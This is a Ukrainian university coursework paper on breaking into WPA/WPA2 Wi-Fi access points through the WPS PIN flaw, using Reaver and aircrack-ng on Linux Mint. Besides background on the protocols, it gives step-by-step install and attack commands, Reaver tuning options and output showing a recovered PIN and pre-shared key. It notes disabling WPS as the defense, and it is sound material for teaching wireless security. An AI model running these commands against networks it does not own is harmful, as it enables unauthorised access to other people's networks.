Зламування Wi-Fi точки доступу з захистом WPA/WPA2 за допомогою операційної системи Linux Mint 13

Вивчення теоретичних відомостей про Linux Mint, дистрибутива операційної системи Linux. Дослідження технології Wi-Fi. Способи об'єднання точок доступу в єдину систему. Особливості організації і управління радіоканалами. Зламування Wi-Fi точки доступу.

Рубрика Программирование, компьютеры и кибернетика
Вид курсовая работа
Язык украинский
Дата добавления 17.05.2013
Размер файла 1,5 M

Отправить свою хорошую работу в базу знаний просто. Используйте форму, расположенную ниже

Студенты, аспиранты, молодые ученые, использующие базу знаний в своей учебе и работе, будут вам очень благодарны.

Размещено на http://allbest.ru/

Зміст

Вступ

1. Теоретичні відомості

2. Опис роботи

2.1 Встановлення інструменту Reaver

2.2 Встановлення інструменту aircrack-ng

2.3 Виконання завдання

Висновки

Список використаних джерел

Вступ

Тема курсової роботи « Зламування Wi-Fi точки доступу з захистом WPA/WPA2 за допомогою операційної системи Linux Mint 13»

Ще не так давно здавалося, що бездротова мережа, захищена за допомогою технології WPA2, цілком безпечна. Підібрати простий ключ для підключення дійсно можливо. Але якщо встановити по-справжньому довгий ключ, то сбрутіть його не допоможуть ні веселкові таблиці, ні навіть прискорення за рахунок GPU. Але, як виявилося, підключитися до бездротової мережі можна і без цього - скориставшись нещодавно знайденою уразливістю в протоколі WPS.

Постановка задачі

Для виконання даної курсової роботи необхідно на практиці виконати зламування Wi-Fiточки доступу, при цьому описавши кожен крок виконання поставленої задачі. Методом захисту Wi-Fi точки доступу обрано WPA/WPA2.

Необхідні операції виконуються на базі операційної системи Linux Mint 13. За допомогою пакету Reaver буде перехоплено PIN (Personal Identification Number)точки, та з його допомогою виконано підключення.

1. Теоретичні відомості

Linux Mint

Linux Mint (англ. mint - м'ята) - дистрибутив операційної системи Linux. Спочатку Linux Mint ґрунтувався на Ubuntu, згодом число його варіацій стало рости і з'явилася гілка дистрибутивів на основі Debian c репозиторіями гілки testing за замовчуванням. За замовчуванням в кожній з складок використовується одна з популярних графічних середовищ - Mate, Cinnamon, KDE, Xfce та інших. Так як збірки Linux Mint в більшості своїй відрізняються від Ubuntu лише складом включених в дистрибутив пакетів, то сумісність з Ubuntu очевидна, що визнають і самі розробники. Мета дистрибутива полягає в наданні кінцевому користувачеві максимально простої системи, яка буде готова до роботи відразу після установки і не зажадає завантажувати найбільш популярне програмне забезпечення, в тому числі і додаткові кодеки для відтворення популярних мультимедійних форматів. В іншому Linux Mint практично ідентичний Ubuntu, в яку приносить новий оригінальний інтерфейс переважно в зелених тонах і невелика кількість власних додатків (mintInstall, mintUpdate, mintMenu та ін), покликаних спростити роботу тим, хто тільки знайомиться з Linux. За цей часто жартома йому дають визначення «Linux Mint - це Ubuntu, тільки краще». Девіз дистрибутива - «fromfreedomcameelegance» («свобода, що приносить елегантність»).

Мінімальні системні вимоги LinuxMint такі ж як і у Ubuntu:

x86 процесор (Для LinuxMint 64-bit потрібна 64-bit процесор. LinuxMint 32-bit працює і на 32-bit, і на 64-bit процесорах);

512 Мб оперативної пам'яті (RAM);

4 Гб на жорсткому диску (HDD) для установки;

відеокарта з роздільною здатністю 800х600;

привід CD-ROM або порт USB.

LinuxMint спочатку включає в себе більше компонентів, ніж Ubuntu:

основні компоненти - Ubuntu 12.04, Linux 3.2 generic, GTK + 3.4.1, Xorg 1.11.4;

має стандартизований інтерфейс, власні значки і колірну гамму меню, вікон та панелей;

набір аудіо та відео кодеків, AdobeFlash і Java;

помічник міграції з Windows;

має зручний центр управління;

mintMenu, що заміняє стандартне меню GNOME (аналог меню Slab в openSUSE);

в базовому комплекті включає в себе Firefox, Thunderbird, LibreOffice, GIMP, Pidgin, Rhythmbox, XChat, GParted (набір інструментів залежно від дистрибутива може варіюватися);

надає 3D-робочий стіл «з коробки» (CompizFusion);

системи оновлення (mintUpdate) і встановлення нових програм (mintInstall).

Рисунок 1.1 - робочий стіл Linux Mint

Технологія Wi-Fi

Торгова марка Wi-Fi Alliance для бездротових мереж на базі стандарту IEEE 802.11. Під абревіатурою Wi-Fi (від англійського словосполучення Wireless Fidelity, яке можна дослівно перекласти як «висока точність безпровідної передачі даних») в даний час розвивається ціле сімейство стандартів передачі цифрових потоків даних по радіоканалах.

Будь-яке обладнання, відповідне стандарту IEEE 802.11, може бути протестоване в Wi-Fi Alliance і отримати відповідний сертифікат на право нанесення логотипу Wi-Fi.

Зазвичай схема Wi-Fi мережі містить не менше однієї точки доступу і не менше одного клієнта. Також можливе підключення двох клієнтів в режимі крапка-крапка (Ad-hoc), коли точка доступу не використовується, а клієнти з'єднуються за допомогою мережевих адаптерів «безпосередньо». Точка доступу передає свій ідентифікатор мережі (SSID (англ.)) за допомогою спеціальних сигнальних пакетів на швидкості 0,1 Мбіт / с кожні 100 мс. Тому 0,1 Мбіт / с - найменша швидкість передачі даних для Wi-Fi. Знаючи SSID мережі, клієнт може з'ясувати, чи можливе підключення до даної точки доступу. При попаданні в зону дії двох точок доступу з ідентичними SSID приймач може вибирати між ними на підставі даних про рівень сигналу. Стандарт Wi-Fi дає клієнту повну свободу при виборі критеріїв для з'єднання. Більш докладно принцип роботи описаний в офіційному тексті стандарту .

Проте, стандарт не описує всі аспекти побудови бездротових локальних мереж Wi-Fi. Тому кожен виробник устаткування вирішує цю задачу по-своєму, застосовуючи ті підходи, які він вважає найкращими з тієї чи іншої точки зору. Тому виникає необхідність класифікації способів побудови бездротових локальних мереж.

За способом об'єднання точок доступу в єдину систему можна виділити:

-Автономні точки доступу (називаються також самостійні, децентралізовані, розумні)

-Точки доступу, що працюють під управлінням контролера (централізовані)

-Безконтролерні, але не автономні (керовані без контролера)

За способом організації і управління радіоканалами можна виділити бездротові локальні мережі:

-Зі статичними налаштуваннями радіоканалів

-З динамічними (адаптивними) настройками радіоканалів

-Зі «шаруватої» або багатошаровою структурою радіоканалів

Reaver

Інструмент використовує уразливість під назвою Wi-FiProtectedSetup, або WPS. Це функція, яка існує на багатьох маршрутизаторах, призначена для забезпечення простого процесу установки і жорстко пов'язана з PIN пристрої. Reaver експлуатує недолік в цих PIN-коди: результатом є те, що за достатній час, він може розкрити свій WPA-або WPA2-пароль.

Aircrack-ng

Набір програм, призначених для виявлення бездротових мереж, перехоплення переданого через бездротові мережі трафіку, аудиту WEP і WPA/WPA2-PSK ключів шифрування (перевірка стійкості), в тому числі пентеста (Penetrationtest) бездротових мереж (схильність атакам на обладнання і атакам на алгоритми шифрування). Програма працює з будь-якими бездротовими мережними адаптерами, драйвер яких підтримує режим моніторингу (список можна знайти на сайті програми). Програма працює в операційних системах Windows, UNIX, Linux і Mac OS X. Версія для UNIX-подібних операційних систем має значно більшу функціональність і підтримує більше бездротових адаптерів, ніж Windows-версія. aircrack-ng був також портований для платформ Zaurus і Maemo. Також програма була портована для iPhone.

Таблиця 1.1 - опис команд Aircrack-ng.

Ім'я

Опис

aircrack-ng

Перебір ключа WEP и WPA (Перебір по словнику).

airdecap-ng

Розшифровує перехвачений трафік при відомому ключі.

airmon-ng

Виставлення карт в режим монітрінга.

aireplay-ng

Пакетний інжектор (LinuxіWindows).

airodump-ng

Аналізатор трафіка: поміщає трафік у файли PCAPабо IVS та показує інформацію про мережі.

airtun-ng

Створює віртуальний інтерфейс тунелювання.

airolib-ng

Зберігає та керує ESSID і паролів ; понижає KPS атак WPA.

packetforge-ng

Створює шифровані пакети для ін'єкції .

airbase-ng

airdecloak-ng

Прибирає WEP-маскування з файлів.

airdriver-ng

Інструмент для керування драйверами бездротових мережевих карт.

airolib-ng

Зберігає списки ESSID і паролів, вираховує парні мастер-ключі.

airserv-ng

Відкриває доступ до бездротової мережевої карти іншим комп'ютерам .

buddy-ng

Сервер-помічник easside-ng.

easside-ng

Інструмент для комутації з точкою доступу без WEP-ключа .

tkiptun-ng

Атака WPA/TKIP.

wesside-ng

Автоматичний інструмент для підбору WEP-ключа.

Рисунок 1.2 - Airodump-ng 0.5

Wi-Fi Protected Setup(WPS) (захищена установка), WPS - стандарт (і однойменний протокол) напівавтоматичного створення бездротової мережі Wi-Fi, створений Wi-Fi Alliance. Офіційно запущений 8 січня 2007.

Метою протоколу WPS є спрощення процесу установки бездротової мережі, тому спочатку він називався Wi-Fi SimpleConfig. Протокол покликаний надати допомогу користувачам, які не володіють широкими знаннями про безпеку в бездротових мережах, і як наслідок, мають складнощі при здійсненні налаштувань. WPS автоматично позначає ім'я мережі і задає шифрування, для захисту від несанкціонованого доступу в мережу, при цьому немає необхідності вручну задавати всі параметри.

У роутерах компанії TP-Link функція називається QSS (Quick Security Setup) і виконує аналогічні функції. Доступна авторизація по PIN-коду.

Уразливість WPS

У грудні 2011 Стефан Фібек (англ. StefanViehbock) і КрейгХеффнер (англ. Craig Heffner) розповіли про серйозні діри в протоколі WPS. Виявилося, що якщо в точці доступу активований WPS c PIN (який за замовчуванням включений в більшості роутерів), то підібрати PIN-код для підключення можна за лічені години!

PIN-код складається з восьми цифр - отже, існує 108 (100'000'000) варіантів для підбору. Однак кількість варіантів можна істотно скоротити. Справа в тому, що остання цифра PIN-коду являє собою якусь контрольну суму, яка вираховується на підставі семи перших цифр. У підсумку отримуємо вже 107 (10'000'000) варіантів. Уразливість протоколу дозволяє розділити пін-код на дві частини, 4 і 3 цифри і перевіряти кожну, на валідність окремо. Отже отримуємо 104 (10'000) варіантів для першої половини і 103 (1000) для другої. У підсумку, всього лише 11'000 варіантів для повного перебору, що в ~ 910 разів менше.

Захист від злому

Захиститися від атаки можна поки одним способом - відключити WPS в налаштуваннях роутера. Правда, зробити це можливо далеко не завжди. Оскільки уразливість існує не на рівні реалізації, а на рівні протоколу. Найбільше, що можуть зробити виробники, випустити прошивку, що дозволяє вводити таймаут на блокування користувача, наприклад, після 5 невдалих спроб введення PIN-коду, що ускладнить брутфорс і збільшить час підбору ідентифікатора зловмисником. Інший шлях - використовувати в PIN не тільки цифри, але й букви.

Рисунок 1.3 - кнопка WPS на бездротовому роутері

PIN-код складається з восьми цифр - отже, існує 10 ^ 8 (100 000 000) варіантів для підбору. Однак кількість варіантів можна істотно скоротити. Справа в тому, що остання цифра PIN-коду являє собою якусь контрольну суму, яка вираховується на підставі семи перших цифр. У підсумку отримуємо вже 10 ^ 7 (10 000 000) варіантів. Але і це ще не все! Далі уважно дивимося на пристрій протоколу аутентифікації WPS (малюнок 3.4). Таке відчуття, що його спеціально проектували, щоб залишити можливість для брутфорса. Виявляється, перевірка PIN-коду здійснюється в два етапи. Він ділиться на дві рівні частини, і кожна частина перевіряється окремо.

Рисунок 1.4- протокол аутентифікації WPS

Якщо після відсилання повідомлення M4 атакуючий отримав у відповідь EAP-NACK, то він може бути впевнений, що перша частина PIN-коду неправильна.

Якщо ж він отримав EAP-NACK після відсилання M6, то, відповідно, друга частина PIN-коду невірна. Отримуємо 10 ^ 4 (10 000) варіантів для першої половини і 10 ^ 3 (1 000) для другої. У підсумку маємо всього лише 11 000 варіантів для повного перебору. Щоб краще зрозуміти, як це буде працювати, подивися на схему.

Важливий момент - можлива швидкість перебору. Вона обмежена швидкістю обробки роутером WPS-запитів: одні точки доступу будуть видавати результат кожну секунду, інші - кожні десять секунд. Основний час при цьому затрачається на розрахунок відкритого ключа по алгоритму Діффі-Хеллмана, він повинен бути згенерований перед кроком M3. Витрачений на це час можна зменшити, вибравши на стороні клієнта простий секретний ключ, який в подальшому спростить розрахунки інших ключів. Практика показує, що для успішного результату зазвичай досить перебрати лише половину всіх варіантів, і в середньому брутфорс займає всього від чотирьох до десяти годин.

WPA та WPA2

(Wi-Fi Protected Access) - являє собою оновлену програму сертифікації пристроїв бездротового зв'язку. Технологія WPA прийшла на заміну технології захисту бездротових мереж WEP. Плюсами WPA є посилена безпека даних і посилений контроль доступу до бездротових мереж. Важливою характеристикою є сумісність між безліччю бездротових пристроїв ,як на апаратному рівні, так і на програмному. На даний момент WPA і WPA2 розробляються і просуваються організацією Wi-Fi Alliance.

У WPA забезпечена підтримка стандартів 802.1X, а також протоколу EAP (Extensible Authentication Protocol, розширюваний протокол автентифікації). Варто зауважити, що в WPA2 підтримується шифрування у відповідності зі стандартом AES (Advanced Encryption Standard, вдосконалений стандарт шифрування), який має ряд переваг над використовуваним в WEP RC4, наприклад набагато більш стійкий криптоалгоритм.

Великим плюсом при впровадженні EWPA є можливість роботи технології на існуючому апаратному забезпеченні Wi-Fi.

Деякі відмітні особливості WPA:

-удосконалена схема шифрування RC4

-обов'язкова аутентифікація з використанням EAP.

-система централізованого управління безпекою, можливість використання в діючих корпоративних політиках безпеки.

Навіть не беручи до уваги той факт що WEP, попередник WPA, не володіє механізмами аутентифікації користувачів як такий, його ненадійність полягає, передусім, в криптографічній слабкості алгоритму шифрування. Ключова проблема WEP полягає у використанні занадто схожих ключів для різних пакетів даних.

TKIP, MIC і 802.1X (частини рівняння WPA) внесли свою лепту в посилення шифрування даних мереж, що використовують WPA.

TKIP відповідає за збільшення розміру ключа з 40 до 128 біт, а також за заміну одного статичного ключа WEP ключами, які автоматично генеруються і розсилаються сервером аутентифікації. Крім того, в TKIP використовується спеціальна ієрархія ключів та методологія управління ключами, яка прибирає зайву передбачуваність, яка використовувалася для несанкціонованого зняття захисту WEP ключів.

Сервер аутентифікації, після одержання сертифіката від користувача, використовує 802.1X для генерації унікального базового ключа для сеансу зв'язку. TKIP здійснює передачу згенерованого ключа користувачеві і точці доступу, після чого вибудовує ієрархію ключів плюс систему управління. Для цього використовується двосторонній ключ для динамічної генерації ключів шифрування даних, які в свою чергу використовуються для шифрування кожного пакету даних. Подібна ієрархія ключів TKIP замінює один ключ WEP (статичний) на 500 мільярдів можливих ключів, які будуть використані для шифрування даного пакету даних.

Іншим важливим механізмом є перевірка цілісності повідомлень (Message Integrity Check, MIC). Її використовують для запобігання перехоплення пакетів даних, зміст яких може бути змінено, а модифікований пакет знову переданий по мережі. MIC побудована на основі потужної математичної функції, яка застосовується на стороні відправника і одержувача, після чого порівнюється результат. Якщо перевірка показує на розбіжність результатів обчислень, дані вважаються помилковими і пакет відкидається.

При цьому механізми шифрування, які використовуються для WPA і WPA-PSK, є ідентичними. Єдина відмінність WPA-PSK полягає в тому, що аутентифікація проводиться з використанням пароля, а не по сертифікату користувача.

2. Опис роботи

операційний точка доступ зламування

2.1 Встановлення інструменту Reaver

Починаючи з версії Ubuntu 12.04, aircrack-ng не міститься в репозиторіях Ubuntu, але не варто засмучуватися. Ви також можете завантажити ісходники з офіційного сайту. Для встановлення потрібно виконати декілька простих дій.

За допомогою терміналу виконаємо установку Reaver:

sudowget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

sudowget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz

Встановити всі необхідні бібліотеки та залежності:

sudoapt-getinstalllibpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev build-essentiallibssl-dev

Витягнути файли reaver, компілювати і встановити:

sudotar -xzvf reaver-1.4.tar.gz

cd reaver-1.4

cdsrc

sudo ./configure

sudomake

sudomakeinstall

Reaver встановлено.

2.2 Встановлення інструменту aircrack-ng

витягуємо файли:

tar -zxvf aircrack-ng-1.1.tar.gz

cd aircrack-ng-1.1

Приклад помилки, яка може виникнути при компіляції :

user@host:~/aircrack-ng-1.1$ make

make -C srcall

make[1]: Enteringdirectory `/home/user/aircrack-ng-1.1/src'

make -C osdep

make[2]: Enteringdirectory `/home/user/aircrack-ng-1.1/src/osdep'

BuildingforLinux

make[3]: Enteringdirectory `/home/user/aircrack-ng-1.1/src/osdep'

gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o osdep.oosdep.c

gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o network.onetwork.c

gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0 -fPIC -I.. -c -o linux.olinux.c

linux.c: Infunction `is_ndiswrapper':

linux.c:165:17: error: variable `unused' setbutnotused [-Werror=unused-but-set-variable]

linux.c: Infunction `linux_set_rate':

linux.c:334:22: error: variable `unused' setbutnotused [-Werror=unused-but-set-variable]

linux.c: Infunction `linux_set_channel':

linux.c:807:22: error: variable `unused' setbutnotused [-Werror=unused-but-set-variable]

linux.c: Infunction `linux_set_freq':

linux.c:896:22: error: variable `unused' setbutnotused [-Werror=unused-but-set-variable]

linux.c: Infunction `set_monitor':

linux.c:1022:22: error: variable `unused' setbutnotused [-Werror=unused-but-set-variable]

linux.c: Infunction `do_linux_open':

linux.c:1366:12: error: variable `unused_str' setbutnotused [-Werror=unused-but-set-variable]

linux.c:1352:15: error: variable `unused' setbutnotused [-Werror=unused-but-set-variable]

linux.c: Infunction `get_battery_state':

linux.c:1982:35: error: variable `current' setbutnotused [-Werror=unused-but-set-variable]

cc1: allwarningsbeingtreatedaserrors

make[3]: *** [linux.o] Error 1

make[3]: Leavingdirectory `/home/user/aircrack-ng-1.1/src/osdep'

make[2]: *** [all] Error 2

make[2]: Leavingdirectory `/home/user/aircrack-ng-1.1/src/osdep'

make[1]: *** [osd] Error 2

make[1]: Leavingdirectory `/home/user/aircrack-ng-1.1/src'

Для вирішення даної проблеми відкриваємо файл common.makу текстовому редакторі:

cd aircrack-ng-1.1

gedit common.mak

Заміняємо код :

CFLAGS ?= -g -W -Wall -Werror -O3

На наступний :

CFLAGS ?= -g -W -Wall -O

Зберігаємо файл та встановлюємо aircrack-ng:

sudomake

sudomakeinstall

2.3 Виконання завдання

Для початку перевіримо, що бездротовий інтерфейс взагалі присутній в системі:

$iwconfig

Якщо у висновку цієї команди є інтерфейс з описом (зазвичай це wlan0) - значить, система розпізнала адаптер (якщо він підключався до бездротової мережі, щоб завантажити Reaver, то краще обірвати підключення). Переведемо адаптер в режим моніторингу:

$ airodump-ng mon0

Рисунок 2.1 - виконання команди airodump-ng

На екрані з'явиться список точок доступу в радіусі досяжності. Нас цікавлять точки з шифруванням WPA/WPA2 і аутентифікацією по ключу PSK. Краще вибирати одну з перших у списку, так як для проведення атаки бажаний хороший зв'язок з крапкою Якщо точок багато і список не вміщується на екрані, то можна скористатися іншою відомою утилітою - kismet, там інтерфейс більш пристосований в цьому плані. Опціонально можна на місці перевірити, чи включений на нашій точці механізм WPS. Для цього в комплекті з Reaver (але тільки якщо брати його з SVN) йде утиліта wash:

$ ./wash -i mon0

Рисунок 2.2 - виконання команди wash

В якості параметра задається ім'я інтерфейсу, переведеного в режим моніторингу. Також можна використовувати опцію '-f' і згодувати утиліті. Cap файл, створений, наприклад, тим же airodump-ng.

Запуск брутфорс :

Тепер можна приступати безпосередньо до перебору PIN'а. Для старту Reaver в самому простому випадку потрібно небагато. Необхідно лише вказати ім'я інтерфейсу (переведеного нами раніше в режим моніторингу) і BSSID точки доступу:

$ reaver -i mon0 -b 64:72:02:83:F8:14 -vv

Ключ "-vv" включає розширений висновок програми, щоб ми могли переконатися, що все працює як треба.

Рисунок 2.3 - виконання команди reaver

Рисунок 2.4 - PIN встановлений на роутері

Після закінчення підбору PIN отримуємо пароль точки доступу та можливість підключення до неї :

Reaver v1.3 WiFiProtectedSetupAttackTool

Copyright (c) 2011, TacticalNetworkSolutions, CraigHeffner<cheffner@tacnetsol.com>

[+] Waitingforbeaconfrom64:72:02:83:F8:14

[+] Associatedwith64:72:02:83:F8:14(ESSID: Kurs_Work')

[+] 0.04% complete @ 2012-01-22 03:01:06 (5 seconds/attempt)

[+] 0.05% complete @ 2012-01-22 03:01:22 (6 seconds/attempt)

[+] 96.76% complete @ 2012-01-22 05:00:31 (4 seconds/attempt)

[+] 96.81% complete @ 2012-01-22 05:00:46 (4 seconds/attempt)

[+] 96.83% complete @ 2012-01-22 05:01:07 (4 seconds/attempt)

[+] 96.85% complete @ 2012-01-22 05:01:30 (4 seconds/attempt)

[+] 96.89% complete @ 2012-01-22 05:01:43 (4 seconds/attempt)

[+] 96.92% complete @ 2012-01-22 05:02:00 (4 seconds/attempt)

[+] 96.96% complete @ 2012-01-22 05:02:14 (4 seconds/attempt)

[+] 97.01% complete @ 2012-01-22 05:02:29 (4 seconds/attempt)

[+] 97.03% complete @ 2012-01-22 05:02:41 (4 seconds/attempt)

[+] 97.05% complete @ 2012-01-22 05:03:15 (4 seconds/attempt)

[+] 97.09% complete @ 2012-01-22 05:03:29 (4 seconds/attempt)

[+] 97.14% complete @ 2012-01-22 05:03:44 (4 seconds/attempt)

[+] WPS PIN: '14937125'

[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7'

[+] AP SSID: 'Kurs_Work'

Рисунок 2.5 - пароль роутера

Нижче наведені додаткові опції, які можуть підвищити швидкість і ефективність перебору ключа.

Можна задати номер каналу і SSID точки доступу:

# Reaver-i mon0-b 00:01:02:03:04:05-c 11-e linksys

Добре позначається на швидкості брутфорса опція '- dh-small', яка задає невелике значення секретного ключа, тим самим полегшуючи розрахунки на стороні точки доступу:

# Reaver-i mon0-b 00:01:02:03:04:05-vv - dh-small

Таймаут очікування відповіді за замовчуванням дорівнює п'яти секундам. При необхідності його можна змінити:

# Reaver-i mon0-b 00:01:02:03:04:05-t 2

Затримка між спробами за замовчуванням дорівнює одній секунді. Вона також може бути налаштована: # Reaver-i mon0-b 00:01:02:03:04:05-d 0

Деякі точки доступу можуть блокувати WPS на певний час. Reaver цю ситуацію помічає і робить паузу в переборі на 315 секунд за замовчуванням, тривалість цієї паузи можна змінювати: # Reaver-i mon0-b 00:01:02:03:04:05 - lock-delay = 250

Деякі реалізації протоколу WPS розривають з'єднання при неправильному PIN-коді, хоча по специфікації повинні повертати особливе повідомлення. Reaver автоматично розпізнає таку ситуацію, для цього існує опція '- nack':

# Reaver-i mon0-b 00:01:02:03:04:05 - nack

Опція '- eap-terminate' призначена для роботи з тими АР, які потребують завершення WPS-сесії за допомогою повідомлення EAP FAIL:

# Reaver-i mon0-b 00:01:02:03:04:05 - eap-terminate

Виникнення помилок у WPS-сесії може означати, що АР обмежує число спроб введення PIN-коду, або просто перевантажена запитами. Інформація про це буде відображатися на екрані. У цьому випадку Reaver призупиняє свою діяльність, причому час паузи може бути задано за допомогою опції '- fail-wait':

# Reaver-i mon0-b 00:01:02:03:04:05 - fail-wait = 360

Висновки

Інструмент Reaver добре справляється з поставленим перед ним завданням. За 6 годин було підібрано PIN бездротового роутера та перехоплено пароль, що дає можливість хакеру підключитися до чужої точки доступу.

Отримано

[+] WPS PIN: '14937125'

[+] WPA PSK: 'elNpTxD2uimQX2b/MpDKb0UL7'

Чи можна захиститися ?

Так, захиститися від атаки можна, але поки що одним способом - відключити WPS в налаштуваннях роутера. Щоправда, як виявилося, зробити це можливо далеко не завжди. Оскільки уразливість існує не на рівні реалізації, а на рівні протоколу.

Список використаних джерел

1) 1.Завантаження Linux[Електронний ресурс] //Download Linux Mint 13 Nadia - Режим доступу до статті:http://www.linuxmint.com/download.php

2) Взломать Wi-Fi за 10 часов[Електронний ресурс] //Журнал Хакер- Режим доступу до статті:http://habrahabr.ru/company/xakep/blog/143834/

3) Reaver. Взлом Wi-Fi сети[Електронний ресурс] //Levinkv'sBlog - Информационная Безопасность- Режим доступу до статті:http://www.levinkv.ru/wi-fi/reaver-vzlom-wi-fi-seti.html

4) Как установить reaver и aircrack-ng[Електронний ресурс] //ITcollider.Ru » Технические темы » Программное обеспечение » Linuxoid »Хакер- Режим доступу до статті:http://itcollider.ru/forum/linuxoid/1179-kak-ustanovit-reaver-i-aircrack-ng-na-ubuntu-12-04-a.html

5) Aircrack-ng[Електронний ресурс] //Вікіпедія - вільна енциклопедія - 2010. - Режим доступу до статті:http://ru.wikipedia.org/wiki/Aircrack-ng

6) Wi-Fi ProtectedSetup[Електронний ресурс] // Вікіпедія - вільна енциклопедія- Режим доступу до статті:http://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup

7) Using Reaveron Ubuntu 10.04 [Електронний ресурс] //Mike's Computer Stuff- Режим доступу до статті: https://www.sites.google.com/site/mikescomputerstuff/using-reaver-on-ubuntu-10-04

Размещено на Allbest.ru


Подобные документы

  • Основні команди операційної системи Linux. Інтерфейс та робота в режимі командного рядка. Системи управління програмою на основі меню. Посилання в текстовому режимі. Список файлів і каталогів, зупинених і фонових завдань. Права доступу до файлів.

    лабораторная работа [196,8 K], добавлен 02.06.2011

  • Багатозадачна операційна система Linux. Поняття операційної системи і дистрибутиву. Команди операційної системи та файлова система Linux. Розгляд структури каталогів та основні команди. Інформація про поточний каталог, створення, зміна та знищення.

    реферат [20,0 K], добавлен 15.03.2009

  • Основні особливості операційної системи Linux, її системні та програмні характеристики. Файли, каталоги та посилання ОС. Робота зі з'ємними носіями інформації. Архівування даних. Особливості роботи в мережі, додатки, текстовий режим функціонування в ОС.

    курсовая работа [2,5 M], добавлен 07.07.2013

  • Набори структур даних, використовуваних для управління файлами. Права доступу до файлу. Монітор файлової системи Process Monitor. Управління аудитом в ОС Windows та в ОС Linux. Доступ до служби каталогів. Практичне застосування Process Monitor.

    курсовая работа [695,9 K], добавлен 09.01.2014

  • Технології організації безпечного доступу на об’єкт. Принцип роботи мережевої системи контролю доступу. Технологія сканування відбитків пальців. Опис базових параметрів біометричного обладнання. Елементи ідентифікації в сучасних системах доступу.

    дипломная работа [4,9 M], добавлен 27.01.2012

  • Ubuntu — операційна система для робочих станцій, серверів. Короткі теоретичні відомості операційної системи Microsoft Windows Server 2003 та Linux Ubuntu. Встановлення операційної системи Microsoft Windows Server 2003 та Linux Ubuntu на віртуальну машину.

    лабораторная работа [3,6 M], добавлен 02.06.2011

  • Анализ технических возможностей операционной системы Mandriva Linux - дистрибутива GNU/Linux, разрабатываемого французской компанией Mandriva, выпускающей свободные, коммерческие и корпоративные версии своего дистрибутива. Этапы установки оболочки Linux.

    презентация [26,2 M], добавлен 23.05.2010

Работы в архивах красиво оформлены согласно требованиям ВУЗов и содержат рисунки, диаграммы, формулы и т.д.
PPT, PPTX и PDF-файлы представлены только в архивах.
Рекомендуем скачать работу.